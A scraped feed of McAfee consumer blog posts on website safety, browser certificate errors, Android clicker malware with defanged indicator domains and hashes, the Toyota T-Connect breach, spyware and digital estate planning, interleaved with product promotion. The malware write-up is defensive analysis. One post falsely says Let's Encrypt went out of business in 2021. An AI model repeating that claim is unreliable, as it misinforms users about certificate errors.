Use McAfee WebAdvisor

McAfee WebAdvisor is a free toolbar that helps keep you safe online. It works with your existing antivirus software to provide an extra layer of protection against online threats. WebAdvisor also blocks unsafe websites and lets you know if a site is known for phishing or other malicious activity. In addition, it can help you avoid online scams and prevent you from accidentally downloading malware. Overall, McAfee WebAdvisor is a useful tool that can help you stay safe while browsing the web.

Website trust seals

When you’re browsing the web, it’s important to be able to trust the websites you’re visiting. One way to determine if a website is trustworthy is to look for trust seals. Trust seals are logos or badges that indicate a website is safe and secure. They usually appear on the homepage or checkout page of a website.

There are many types of trust seals, but some of the most common include the Better Business Bureau (BBB) seal, VeriSign secure seal, and the McAfee secure seal. These seals indicate that a third-party organization has verified the website as safe and secure.

While trust seals can help determine whether a website is trustworthy, it’s important to remember that they are not foolproof. Website owners can create a fake trust seal, so it’s always important to do your own research to ensure a website is safe before entering personal information.

Check for a privacy policy

Another way to determine if a website is safe to visit is to check for a privacy policy. A privacy policy is a document that outlines how a website collects and uses personal information. It should also state how the site protects your data from being accessed or shared by scammers, hackers, or other unauthorized individuals.

If a website doesn’t have a privacy policy, that’s a red flag that you shouldn’t enter any personal information on the site. Even if a website does have a privacy policy, it’s important to read it carefully so you understand how the site uses your personal data.

Check third-party reviews

It’s important to do some preliminary research before visiting a new website, especially if you’re shopping online or entering personal data like your address, credit card, or phone number. One way to determine if a website is safe and trustworthy is to check third-party reviews. Several websites provide reviews of other websites, so you should be able to find several reviews for any given site.

Trustpilot is one example of a website that provides reviews of other websites.Look for common themes when reading reviews. If most of the reviews mention that a website is safe and easy to use, it’s likely that the site is indeed safe to visit. However, if a lot of negative reviews mention problems with viruses or malware, you might want to avoid the site.

Look over the website design

You can also analyze the website design when deciding whether a website is safe to visit. Look for spelling errors, grammatical mistakes, and anything that appears off. If a website looks like it was made in a hurry or doesn’t seem to be well-designed, that’s usually a red flag that the site might not be safe.

Be especially careful of websites that have a lot of pop-ups. These sites are often spammy or contain malware. Don’t download anything from a website unless you’re absolutely sure it’s safe. These malicious websites rarely show up on the top of search engine results, so consider using a search engine to find what you’re looking for rather than a link that redirects you to an unknown website.

Download McAfee WebAdvisor for free and stay safe while browsing

If you’re unsure whether a website is safe to visit, download McAfee WebAdvisor for free. McAfee WebAdvisor is a program that helps protect you from online threats, such as malware and viruses. It also blocks pop-ups and other intrusive ads so you can browse the web without worry. Plus, it’s completely free to download and use.

Download McAfee WebAdvisor now and stay safe while browsing the web.

The post How to Tell Whether a Website Is Safe or Unsafe appeared first on McAfee Blog.

]]>
“This Connection Is Not Private” – What it Means and How to Protect Your Privacy https://www.mcafee.com/blogs/internet-security/what-connection-is-not-private-means/ Thu, 20 Oct 2022 19:00:02 +0000 https://www.mcafee.com/blogs/?p=160699

Have you ever been browsing online and clicked a link or search result that took you to a site that...

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

]]>

Have you ever been browsing online and clicked a link or search result that took you to a site that triggers a “your connection is not private” or “your connection is not secure” error code? If you’re not too interested in that particular result, you may simply move on to another result option. But if you’re tempted to visit the site anyway, you should be sure you understand what the warning means, what the risks are, and how to bypass the error if you need to.

What does “this connection is not private” mean?

A “your connection is not private” error means that your browser cannot determine with certainty that a website has safe encryption protocols in place to protect your device and data. You can bump into this error on any device connected to the internet — computer, smartphone, or tablet.

So, what exactly is going on when you see the “this connection is not private” error?

For starters, it’s important to know that seeing the error is just a warning, and it does not mean any of your private information is compromised. A “your connection is not private” error means the website you were trying to visit does not have an up-to-date SSL (secure sockets layer) security certificate.

Website owners must maintain the licensing regularly to ensure the site encryption capabilities are up to date. If the website’s SSL certificate is outdated, it means the site owners have not kept their encryption licensing current, but it doesn’t necessarily mean they are up to no good. Even major websites like LinkedIn have had momentary lapses that would throw the error. LinkedIn mistakenly let their subdomain SSL certificates lapse.

In late 2021, a significant provider of SSL certificates, Let’s Encrypt, went out of business. When their root domain officially lapsed, it created issues for many domain names and SSL certificates owned by legitimate companies. The privacy error created problems for unwitting businesses, as many of their website visitors were rightfully concerned about site security.

While it does not always mean a website is unsafe to browse, it should not be ignored. A secure internet connection is critical to protecting yourself online. Many nefarious websites are dangerous to visit, and this SSL certificate error will protect you from walking into them unaware.

SL certification standards have helped make the web a safer place to transact. It helps ensure online activities like paying bills online, ordering products, connecting to online banking, or keeping your private email accounts safe and secure. Online security continues to improve with a new Transport Layer Security (TLS) standard, which promises to be the successor protocol to SSL.

So be careful whenever visiting sites that trigger the “connection is not private” error, as those sites can potentially make your personal data less secure and make your devices vulnerable to viruses and malware.

Note: The “your connection is not private” error is Google Chrome’s phrasing. Microsoft Edge or Mozilla Firefox users will instead see a “your connection is not secure” error as the warning message.

How to fix the “connection is not private” error

If you feel confident that a website or page is safe, despite the warning from your web browser, there are a few things you can do to troubleshoot the error.

    • Refresh the page. In some cases, the error is just a momentary glitch. Try reloading the page to rule out a temporary error.
    • Close browser and reopen. Closing and reopening your web browser might also help clear a temporary glitch.
    • If you’re on public WiFi, think twice. Hackers often exploit public WiFi because their routers are usually not as secure or well maintained for security. Some public WiFi networks may not have an SSL connection, or they may limit your access to websites. You can safely browse more securely in public spaces if you have an antivirus software or virtual private network (VPN) solution.
    • Use “Incognito” mode. The most used browsers (Google Chrome browser, Mac’s Safari, Mozilla Firefox, and Microsoft Edge) offer an “Incognito mode” that lets you browse without data collecting in your history or cache. Open the site in a new incognito window and see if the error still appears.
    • Clear the cache on your browser. While cookies make browsing the web more convenient and personalized, they also can hold on to sensitive information. Hackers will take advantage of cached data to try and get passwords, purchase information, and anything else they can exploit. Clear browsing data before going to a site with the “connection is not secure” error to help limit available data for hackers.
    • Check the computer’s date and time. If you frequently see the “connection is not private” error, you should check and ensure your computer has the accurate time and date. Your computer’s clock can sometimes have time and date stamp issues and get glitchy in multiple ways. If it’s incorrect, adjust the date and set the time to the correct settings.
    • Check your antivirus software. If your antivirus software is sensitive, you may have to disable it momentarily to bypass the error. Antivirus software protects you, so you should be careful to remember to turn the software back on again after you’ve bypassed the error.
    • Be sure your browsers and operating systems are up to date. You should always keep your critical software and the operating system fully updated. An outdated browser can start getting buggy and can increase the occurrence of this kind of error.
    • Research the website. Do a quick search for the company of the website you wish to visit and make sure they are a legitimate business. You can search for reviews, Better Business Bureau ratings, or check for forums to see if others are having the same issue. Be sure you are spelling the website address correctly and that you have the correct URL for the site. Hackers can take advantage of misspellings or alternative URLs to try and snare users looking for trusted brands.
    • If it’s not you, it’s them. If you’ve tried all the troubleshooting techniques above and you still see the error, the problem is likely coming from the site itself. If you’re willing to take your chances (after clearing your browser’s cache), you can click the option to “proceed to the domain,” though it is not recommended. You may have to choose “advanced settings” and click again to visit the site.

Remember, you are taking your chances anytime you ignore an error. As we mentioned, you could leave yourself vulnerable to hackers after your passwords, personal information, and other risks.

How to protect your privacy when browsing online

Your data and private information are valuable to hackers, so they will continue to find new ways to try and procure it. Here are some ways to protect yourself and your data when browsing online.

  • Antivirus solutions are, hands down, your best line of protection against hacking. Solutions like McAfee+ Ultimate offer all the tools you need to secure your data and devices.
  • Use strong passwords and two-factor authentication when available.
  • Delete unused browser extensions (or phone apps) to reduce access.
  • Always keep your operating system and browsers up-to-date. You can open system preferences and choose to update your system automatically.
  • Use a secure VPN solution to shield your data when browsing.
  • Use your favorite browser’s incognito mode to reduce the data connected to your devices.
  • Remove any 3rd party apps from your social media accounts — especially if you’ve recently taken a Facebook quiz or similar (also, don’t take Facebook quizzes).
  • Engage the highest privacy settings in each of your browsers.
  • Always check the address bar for HTTPS before sharing credit cards or other sensitive data on a website.
  • Share less personal and private information on social media.

Discover how McAfee keeps you and your data safe from threats

As we continue to do more critical business online, we must also do our best to address the risks of the internet’s many conveniences.

A comprehensive cybersecurity tool like McAfee+ Ultimate can help protect you from online scams, identity theft, and phishing attempts, and ensure you always have a secure connection. McAfee helps keep your sensitive information out of the hands of hackers and can help you keep your digital data footprints lighter with personal data cleanup.

With McAfee’s experts on your side, you can enjoy everything the web offers with the confidence of total protection.

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

]]>
New Malicious Clicker found in apps installed by 20M+ users https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-malicious-clicker-found-in-apps-installed-by-20m-users/ Wed, 19 Oct 2022 18:09:58 +0000 https://www.mcafee.com/blogs/?p=160794

Authored by SangRyol Ryu Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many...

The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.

]]>

Authored by SangRyol Ryu

Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many mobile malwares masquerading as a useful tool or utility, and automatically crawling ads in the background. Recently the McAfee Mobile Research Team has identified new Clicker malware that sneaked into Google Play. In total 16 applications that were previously on Google Play have been confirmed to have the malicious payload with an assumed 20 million installations.

McAfee security researchers notified Google and all of the identified apps are no longer available on Google Play. Users are also protected by Google Play Protect, which blocks these apps on Android. McAfee Mobile Security products detect this threat as Android/Clicker and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.

How it works

The malicious code was found on useful utility applications like Flashlight (Torch), QR readers, Camara, Unit converters, and Task managers:

Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. At first glance, it seems like well-made android software. However, it is hiding ad fraud features behind, armed with remote configuration and FCM techniques.

Attribute name Known meaning of the value
FCMDelay Initial start hours after first installation
adButton Visivility of a button of Advertisement
adMob AdMob unit ID
adMobBanner AdMob unit ID
casOn Whether CAS library works or not
facebookAd FaceBook Ad ID
fbAdRatio Ratio of FB AD
googleAdRatio Ratio of AdMob
is Decide BootService to run or not
urlOpen to open popup or not when starts PowerService
popUrl URL for PowerService
popUpDelay Delay time for PowerService
liveUrl URL for livecheck service
pbeKey Key for making unique string
playButtonList URL for other service
reviewPopupDialog  ‘y’ it shows review dialog
tickDelay Delay time for TickService
tickEnable Value of TickService enabled
tickRandomMax Value of TickService random delay
tickRandomMin Value of TickService random delay
tickType Set the type of TickService
updateNotiVersion Value for showing update activity

 

The FCM message has various types of information and that includes which function to call and its parameters. The picture below shows some of FCM message history:

When an FCM message receives and meets some condition, the latent function starts working. Mainly, it is visiting websites which are delivered by FCM message and browsing them successively in the background while mimicking user’s behavior. This may cause heavy network traffic and consume power without user awareness during the time it generates profit for the threat actor behind this malware. In the picture below there is an example of the network traffic generated to get the information required to generate fake clicks and the websites visited without user’s consent or interaction:

Malicious components: CAS and LivePosting

So far, we have identified two pieces of code related to this threat. One is “com.click.cas” library which focuses on the automated clicking functionality while “com.liveposting” library works as an agent and runs hidden adware services:

Depending on the version of the applications, some have both libraries working together while other applications only have “com.liveposting” library. The malware is using installation time, random delay and user presence to avoid the users from noticing these malicious acts. The malicious behavior won’t start if the installation time is within an hour and during the time the user is using the device, probably to stay under the radar and avoid being detected right away:

Conclusion

Clicker malware targets illicit advertising revenue and can disrupt the mobile advertising ecosystem. Malicious behavior is cleverly hidden from detection. Malicious actions such as retrieving crawl URL information via FCM messages start in the background after a certain period of time and are not visible to the user.

McAfee Mobile Security detects and removes malicious applications like this one that may run in the background without user’s knowledge. Also, we recommend having a security software installed and activated so you will be notified of any mobile threats present on your device in a timely manner. Once you remove this and other malicious applications, you can expect an extended battery time and you will notice reduced mobile data usage while ensuring that your sensitive and personal data is protected from this and other types of threats.

IoCs (Indicators of Compromise)

liveposting[.]net

sideup[.]co[.]kr

msideup[.]co[.]kr

post-blog[.]com

pangclick[.]com

modooalba[.]net

 

SHA256 Package name Name Downloaded
a84d51b9d7ae675c38e260b293498db071b1dfb08400b4f65ae51bcda94b253e com.hantor.CozyCamera High-Speed Camera 10,000,000+
00c0164d787db2ad6ff4eeebbc0752fcd773e7bf016ea74886da3eeceaefcf76 com.james.SmartTaskManager Smart Task Manager 5,000,000+
b675404c7e835febe7c6c703b238fb23d67e9bd0df1af0d6d2ff5ddf35923fb3 kr.caramel.flash_plus Flashlight+ 1,000,000+
65794d45aa5c486029593a2d12580746582b47f0725f2f002f0f9c4fd1faf92c com.smh.memocalendar 달력메모장 1,000,000+
82723816760f762b18179f3c500c70f210bbad712b0a6dfbfba8d0d77753db8d com.joysoft.wordBook K-Dictionary 1,000,000+
b252f742b8b7ba2fa7a7aa78206271747bcf046817a553e82bd999dc580beabb com.kmshack.BusanBus BusanBus 1,000,000+
a2447364d1338b73a6272ba8028e2524a8f54897ad5495521e4fab9c0fd4df6d com.candlencom.candleprotest Flashlight+ 500,000+
a3f484c7aad0c49e50f52d24d3456298e01cd51595c693e0545a7c6c42e460a6 com.movinapp.quicknote Quick Note 500,000+
a8a744c6aa9443bd5e00f81a504efad3b76841bbb33c40933c2d72423d5da19c com.smartwho.SmartCurrencyConverter Currency Converter 500,000+
809752e24aa08f74fce52368c05b082fe2198a291b4c765669b2266105a33c94 com.joysoft.barcode Joycode 100,000+
262ad45c077902d603d88d3f6a44fced9905df501e529adc8f57a1358b454040 com.joysoft.ezdica EzDica 100,000+
1caf0f6ca01dd36ba44c9e53879238cb46ebb525cb91f7e6c34275c4490b86d7 com.schedulezero.instapp Instagram Profile Downloader 100,000+
78351c605cfd02e1e5066834755d5a57505ce69ca7d5a1995db5f7d5e47c9da1 com.meek.tingboard Ez Notes 100,000+
4dd39479dd98124fd126d5abac9d0a751bd942b541b4df40cb70088c3f3d49f8 com.candlencom.flashlite 손전등 1,000+
309db11c2977988a1961f8a8dbfc892cf668d7a4c2b52d45d77862adbb1fd3eb com.doubleline.calcul 계산기 100+
bf1d8ce2deda2e598ee808ded71c3b804704ab6262ab8e2f2e20e6c89c1b3143 com.dev.imagevault Flashlight+ 100+

 

The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.

]]>
Toyota Data Breach Exposes Customer Data – What You Can Do to Protect Yourself https://www.mcafee.com/blogs/privacy-identity-protection/toyota-data-breach-exposes-customer-data-what-you-can-do-to-protect-yourself/ Tue, 18 Oct 2022 13:21:02 +0000 https://www.mcafee.com/blogs/?p=160236

Automobile manufacturer Toyota recently announced a data breach that may have exposed the emails of up to 300,000 customers for...

The post Toyota Data Breach Exposes Customer Data – What You Can Do to Protect Yourself appeared first on McAfee Blog.

]]>

Automobile manufacturer Toyota recently announced a data breach that may have exposed the emails of up to 300,000 customers for a period of nearly five years. 

Toyota says the breach is the result of a subcontractor posting source code for Toyota’s “T-Connect” app on the software development platform GitHub in December 2017. This code included an access key to the data server that hosted the e-mail addresses and customer management numbers of T-Connect users. The publicly available source code was found on September 15th, 2022, at which time Toyota changed the access key. 

Toyota customers affected by this data breach include T-Connect users who registered their email on the Toyota T-Connect site since July 2017. 

According to Toyota’s announcement and apology no other personal information such as customer names, phone numbers, and credit cards were affected. (Note that this announcement was published in Japanese—you can use your browser to translate.) 

The company further could not confirm whether this information was in fact accessed. However, the company could not deny the possibility that it was at some point during that five-year period. 

Toyota said that it will individually send an apology and notification to the registered email address of any customer whose information may have been leaked.   

I’m a Toyota owner. What should I do about the Toyota T-Connect data leak? 

Any time a data breach occurs, it means that your personal information could end up in the hands of a bad actor. Different pieces of personal information can be more useful to them than others. Some are directly useful, such as a Social Security Number or credit card information because they uniquely identify you. Others are indirectly helpful, like device IDs, browsing history, geolocation information, and internet protocol addresses. On their own, such information will not uniquely identify you. Yet with enough indirect information, and in the right combination, a bad actor could use them to piece together your identity. 

In light of this, there are a few steps you can take to protect yourself in the aftermath of a data breach, which involves a combination of preventative steps and some monitoring on your part. 

Keep an eye out for phishing attacks 

Given that email addresses may have been compromised, Toyota specifically warned its customers about the possibility of phishing attacks and other unsolicited emails that may contain malware or links to malicious sites. While it’s always wise to keep a skeptical eye open for unsolicited messages that ask you for information or that contain attachments you weren’t expecting, it’s particularly important after breaches. If you receive such emails, delete them, and don’t click on any links or attachments.  

Also note that bad actors may launch phishing attacks where they pose as Toyota, all with the aim to steal personal information. Such emails can clearly look like a scam, such as when they include typos, grammatical errors, or sloppy graphics. Others can look far more sophisticated, almost like a legitimate email. Learning how to tell the two apart can take a little skill, and you can check out this quick read so you can spot and protect yourself from phishing scams. 

Consider using comprehensive online protection 

A complete suite of online protection software can offer layers of extra security. In addition to more private and secure time online with a VPN, identity monitoring, and password management, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—which antivirus protection can’t do alone. Additionally, we offer $1M identity theft coverage and support from a recovery pro, just in case. 

Change your passwords and use a password manager 

As far as passwords go, strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager will help you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly may make a stolen password worthless because it’s out of date. 

Because so many accounts use an email address as the username, and because email addresses were exposed in the Toyota leak, updating your passwords across your accounts can provide an extra level of protection. 

Enable two-factor authentication 

While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts will help your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it. 

Consider using identity monitoring 

An identity monitoring service can monitor everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft.​ Personal information harvested from data breaches can end up on dark web marketplaces where it’s bought by other bad actors so they can launch their own attacks. McAfee’s monitors the dark web for your personal info and provides early alerts if your data is found on there, an average of 10 months ahead of similar services.​ We also provide guidance to help you act if your information is found. 

Clean up your personal data online 

As mentioned earlier, information stolen in a data breach may indirectly identify you. Yet when pieced together with other information, it can then directly identify you. Cad actors can complete this identity picture puzzle with information provided by data brokers that buy and sell personal information online. However, you can take some control over this. Our Personal Data Cleanup service scans high-risk data broker sites for your personal information and then helps you remove it—which denies bad actors the information they may need to commit identity theft. 

Staying Safe in the Wake of the Toyota Data Leak 

If your personal information gets caught up in a data leak or breach, take the steps to protect yourself. Should that information get into the hands of bad actors, it could lead to follow-on attacks such as phishing attempts, account hacks, and, in extreme cases, identity crime. 

Further, as in the case of Toyota, it can take months or even years for companies to discover leaks and breaches. From there, it can take yet longer before a company announces the leak or breach. Together, that leaves bad actors with plenty of opportunity to commit all kinds of identity crime in the meantime.  

Because of this, taking preventative steps to secure and monitor your identity can help protect you from harm—even if your information wasn’t involved in an attack. With data leaks and breaches of all sizes now commonplace, a proactive stance offers far better protection than reactionary measures taken after the fact. 

The post Toyota Data Breach Exposes Customer Data – What You Can Do to Protect Yourself appeared first on McAfee Blog.

]]>
True Security Requires a Holistic Approach https://www.mcafee.com/blogs/internet-security/true-security-requires-a-holistic-approach/ Mon, 17 Oct 2022 08:06:02 +0000 /blogs/?p=116668 Holistic Security

In the eyes of hackers, scammers, and thieves, your online privacy and identity look like a giant jigsaw puzzle. One...

The post True Security Requires a Holistic Approach appeared first on McAfee Blog.

]]>
Holistic Security

In the eyes of hackers, scammers, and thieves, your online privacy and identity look like a giant jigsaw puzzle. One that they don’t need every piece to solve. They only need a few bits to do their dirty work, which means protecting every piece you put out there—a sort of holistic view on your personal security. One that protects you, not just your devices.

Here’s what’s at stake: we create and share loads of personal information simply by going about our day online, where each bit of information makes up a piece of that giant jigsaw puzzle. Some pieces directly identify us, like our tax returns, bank account information, or driver’s licenses. Other pieces of information indirectly identify us, like the IP addresses assigned to our computers, tablets, and phones—or device ID numbers, location information, and browsing history. And bad actors only need a few key pieces to do you harm, such as committing identity crime in your name or selling your personal information on sketchy websites or the dark web. 

While people show great concern about their personal information, who has it and what’s done with it, our research shows that 70% of people feel like they have little or no control over the data that’s collected about them. However, you have plenty of ways that you can indeed take control—ways that can prevent, detect, and correct attacks on your privacy and identity. That’s where holistic protection comes in. 

What do we mean by holistic protection? 

You can think of holistic protection as layers of shields that protect you and the devices you use. It gives you three layers in all—a Prevention Layer, Detection Layer, and a Correction Layer. 

A holistic and comprehensive security solution like McAfee+ combines those three layers in a way that protects your personal information and keep your identity private, showing you how it does it along the way, so you can see exactly how safe you are. Let’s take a quick look of some of the protections you’ll find in each layer … 

A holistic approach to security

In the Prevention Layer, you’ll see:  

  • A virtual private network (VPN), allowing you to connect securely on a public Wi-Fi network by encrypting, or scrambling, your data while in transit so no one else sees it. It’ll also make your activity far more private, making it harder for advertisers and data collectors to track. 
  • Safe browsing that warns you if a website is risky before you enter your information and can steer you clear of risky links, while a download scanner can prevent downloads of malware or malicious email attachments. 
  • An integrated password managerthat can create and store strong and unique passwords for each of your accounts. This way if one of your accounts is hacked, your other accounts won’t be at risk. 
  • A security freeze service that can prevent hackers and thieves from opening of new credit, bank, and utility accounts in your name.​ 
  • Real-time antivirus that protects your data and devices. 

In the Detection Layer, you have … 

  • Identity monitoring that keeps tabs on everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft. 
  • McAfee’s industry-first Protection Score that monitors the health of your online protection and shows you ways you can improve your security and stay safe online. 

In the Correction Layer, several other protections have your back … 

  • Identity theft protection & restoration that aids with many of the costs associated with restoring one’s identity through up to $1 million in coverage—along with the services of a licensed recovery pro to help restore your identity.​ 
  • Personal data cleanup that scans some of the riskiest data broker sites and shows you which ones are selling your personal info so that you can remove it on your own or with our help, depending on your plan. 

These are just a few examples of the protections in each layer. And you’ll find our most comprehensive holistic protection in McAfee+ Ultimate, covering your privacy, identity, and devices. 

A Unified Solution for your Privacy, Identity, and Devices 

While your online privacy and identity may look a jigsaw puzzle, protecting it shouldn’t be as complicated. With a holistic security solution for your personal protection, you can minimize your exposure with layers of security that do much of the work for you. 

Antivirus on your PC is not enough. It has not been enough for many decades now. And this becomes more evident as we continue to spend more time online, with the average person spending 6 hours and 54 minutes online each day, leaving clouds of personal information in their wake. 

While standalone apps like a password manager, a VPN app, and an identity solution from different vendors can be piecemealed together with your device security, these are difficult to keep track of and burdensome to maintain. 

We have combined the important tools you need into a seamless and comprehensive experience because good security software is something that you use daily to feel safer online. This is why we are working on your behalf to redefine security, so you can enjoy your connected life with confidence. 

The post True Security Requires a Holistic Approach appeared first on McAfee Blog.

]]>
What is Spyware? https://www.mcafee.com/blogs/privacy-identity-protection/what-is-spyware/ Sun, 16 Oct 2022 14:06:50 +0000 https://securingtomorrow.mcafee.com/?p=74494

No one likes the feeling that someone is looking over their shoulder when they work, shop or surf online. But...

The post What is Spyware? appeared first on McAfee Blog.

]]>

No one likes the feeling that someone is looking over their shoulder when they work, shop or surf online. But this is just what crooks and scammers do without our knowledge using “spyware.”

Spyware is a piece of software that can covertly gather information on you. It can track the websites you visit and even record what you type on your keyboard, including passwords and credit card numbers.

So, now the bad guys don’t have to steal your wallet to get access to your personal and financial information. All they need to do is trick you into installing spyware on your computer or device. Or they could install it themselves on public or shared computers using a USB drive, or similar device.

One of the more common forms of spyware found on shared computers is called a “keylogger.” It can record everything you type and send it back to the cybercrook. That’s why you should avoid using shared computers in hotels or public libraries, since they can be easily compromised.
Most spyware masquerades as legitimate software, such as free games or mobile apps. In fact, researchers believe that over three years, 1 million Google Play users downloaded a single piece of spyware alone. It appeared to be an official “System Update” application, but actually monitored the users’ location information and text messages without their knowledge.

Spyware can also easily spread online in the form of dangerous links in emails, and on social media or torrent sites, which offer free access to online content. That’s why you need to be careful where you click.

Another common form of spyware is called “adware.” Adware is used to display advertisements on your computer, or redirect your search inquiries to an advertiser’s website. Although this isn’t as harmful as spyware designed to steal your information, it is still invasive and annoying.

Since spyware is so prevalent and potentially harmful, putting both your private information and privacy at risk, it’s important that you take steps to protect yourself.

Here are some tips to keep you safe:

  • Only visit trusted websites and be suspicious of sites offering “free” content or applications.
  • Be careful when downloading any software or mobile apps from the web. Read other users’ reviews first to make sure the product is safe. Also, read any licensing or service agreements carefully to see if the provider is accessing more information than it needs to.
  • Never leave your computer or devices unattended in public, since a cybercrook could potentially install spyware when you’re not looking.
  • Avoid clicking on online ads, since they could lead to adware.
  • Look out for anti-spyware scams. There are many phony “anti-spyware” tools online that offer free scans. They falsely detect multiple spyware programs on your computer to get you to buy their product.
  • Make sure you use comprehensive security software that includes spyware protection, and keep it up-to-date.

The post What is Spyware? appeared first on McAfee Blog.

]]>
Digital Estate Planning – What to Do With Your Digital Assets https://www.mcafee.com/blogs/family-safety/digital-estate-planning-what-to-do-with-your-digital-assets/ Thu, 13 Oct 2022 12:19:05 +0000 /blogs/?p=120598

While we’re enjoying the fruits of digital life—our eBooks, movies, email accounts, social media profiles, eBay stores, photos, online games,...

The post Digital Estate Planning – What to Do With Your Digital Assets appeared first on McAfee Blog.

]]>

While we’re enjoying the fruits of digital life—our eBooks, movies, email accounts, social media profiles, eBay stores, photos, online games, and more—there will come a time we should ask ourselves, What happens to all of this good stuff when I die?

Like anything else we own, those things can be passed along through our estates too.

With the explosion of digital media, commerce, and even digital currency too, there’s a very good chance you have thousands of dollars of digital assets in your possession. For example, we can look at research we conducted in 2011 which found that people placed an average value of $37,438 on the digital assets they owned at the time. Now, with the growth of streaming services, digital currency, cloud storage, and more in the past ten years, that figure feels conservative.

Enter the notion of a digital legacy, the way you can catalog and prepare your digital assets for passing through your estate.

Getting started with estate planning for your digital assets

Like so many aspects of digital life nowadays, estate planning law has started to catch up to the realities that attorneys, executors, and heirs face when dealing with an estate and its digital assets. In the U.S., new laws are rolling out that address how digital assets are treated when the owner passes away. For example, they give fiduciaries (like an estate executor, trustee, or an agent under a power of attorney) the right to manage a person’s digital assets if they already have the right to manage a person’s tangible assets. Such laws continue to evolve, and they can vary from state to state here in the U.S.

With that in mind, nothing offered in this article is legal advice, nor should it be construed as such. For legal advice, you can and should turn to your estate attorney for counsel on the best approach for you and the laws in your area. However, consider this article as a sort of checklist that can help you with your estate planning.

My hope is that this article will open your eyes to the digital value you have to pass along, both real and sentimental, and help you prepare your estate accordingly for the ones you care about.

What are digital assets in a will?

The best answer you can get to this question will come from your legal counsel. However, for purposes of discussion, a digital asset is any text or media in digital form that has value and offers the bearer with the right to use it.

To frame it up in everyday terms, let’s look at some real-world examples of digital assets that quickly come to mind. They include but are not limited to:

  • Photo libraries
  • eBook libraries
  • Digital movies
  • Digital music
  • Digital currency, such as bitcoin
  • Air miles
  • Hotel points

However, digital assets can readily expand to further include:

  • Subscriptions to streaming services and online publications
  • Online game accounts—and in-game items associated with them
  • Currency stored in online payment platforms
  • Online storefronts, such as eBay, Etsy, or business websites
  • Website domain names, whether in use or held speculatively for later resale
  • Documents kept in cloud storage, like financial documents and ancestry research

And as far as your estate is concerned, you can also consider:

  • Online banking and financial accounts
  • Email accounts
  • Chatrooms and message boards for your interests and hobbies
  • Medical and insurance accounts
  • Blogs
  • Utility accounts
  • And any other similar accounts that may help your executor manage your estate

That’s quite the list, and it’s not entirely comprehensive, either.

Start with an inventory of your digital assets

The process of lining up your digital assets begins just like any other aspect of estate planning, by listing all the digital assets and accounts you own. From there, you can see what you have and what you’d like to distribute—and what you can distribute. In fact, when it comes to digital, there are some things you simply can’t pass along. Let’s take a closer look.

What digital assets can you pass along through your will?

Generally speaking, digital assets that you own can be passed along. “Own” is the operative word here. Many digital things we have are in fact licensed to us, which are not transferrable. More on that next, yet examples of things you can likely transfer include:

  • Funds kept in an online payment account like PayPal or Venmo.
  • Funds due to you via an online store you maintain.
  • Cryptocurrency, like bitcoin.
  • Digital music that you’ve purchased and own.

Check with your legal counsel to ensure you’re following the letter of the law in your region, and also look into any licensing agreements you may have for items like internet domain names and airline miles that you may hold to determine if they are in fact transferrable.

What digital assets are non-transferrable through your will?

This is an important topic. As mentioned above, some accounts you hold are simply licensed to you and you alone. Thus, they will not transfer. Two of the biggest examples are social media and email accounts. This can have serious repercussions if you do not leave specific instructions as to how those accounts should be handled after your passing.

For example, do you want your social media profiles to remain online as a memorial or do you want them simply to shut down? Note that different social media platforms have different policies for handling the accounts of users who have passed away. For example, Facebook allows for creating memorialized accounts that allow friends and families to continue sharing memories. Policies vary, so check with your social media platforms of choice for specifics.

Likewise, will your executor need access to your email account to handle affairs of the estate? And what about access to online accounts for paying bills and then ultimately closing those accounts? In all, these are points of discussion to have with an experienced estate attorney who knows the law in your region.

Other things to be aware of are that subscriptions to streaming accounts are likely non-transferrable as well. Often, eBooks and digital publications you own are only licensed to you as the sole owner and can’t be transferred. Again, check the agreements associated with items like these and have a talk with your attorney about them to determine what can and can’t be done with them.

Blogs and online communities

Another aspect of your digital legacy is your voice. If you’re a blogger or a participant in an online community, you may wish for a fiduciary or family member to leave a farewell post. Additionally, in the case of a blog, you may want to set up some means for your work to stay online or get archived in some manner. Again, you can work with your attorney to leave specific instructions as to what should be said and then what should be done with the blog or site in question.

Giving your executor access to your digital assets

I have a real-life example of why this is so vital. A friend of mine lost the photos of her and her husband because they were kept in an online storage account to which she had no access. And sadly, the company would not grant her access after his passing. This is often the case with many online accounts and services. Legally speaking, while the deceased may have owned the storage account and the media kept within it, the cloud storage company owns the servers on which that media is stored. The potential difficulty here is that the online service provider may view giving your personal representatives access to your account as a breach of their privacy policy or user agreements.

One way you can avoid heartbreak like this is to discuss giving your executor access to your accounts. This can be provided through a list of accounts, usernames, and passwords that are kept in a sealed letter along with your will, along with instructions that outline your wishes. This is important: a will is public record after you pass away. You won’t want info like usernames and passwords getting out there. Again, you can discuss an option such as this with your attorney.

Protecting your digital assets

One thing you can do today that can protect your digital assets for the long haul is to use comprehensive security protection. Far more than just antivirus, comprehensive security can store precious and important files securely with encryption, arm all your online accounts with strong passwords, and protect your identity as well. Features like these will help you see to it that your digital legacy is secure.

Make a plan

When I’ve brought up the idea of a digital legacy with friends, a light goes on in their head. “Of course, that makes a lot of sense.” It’s easy to take our digital possessions somewhat for granted, perhaps in a way that we simply don’t with our physical possessions. Yet as you can see, there’s a good chance that you indeed have a digital legacy to pass along. By getting organized now, you can see to it that your wishes are followed, and I hope this checklist helps you get started.

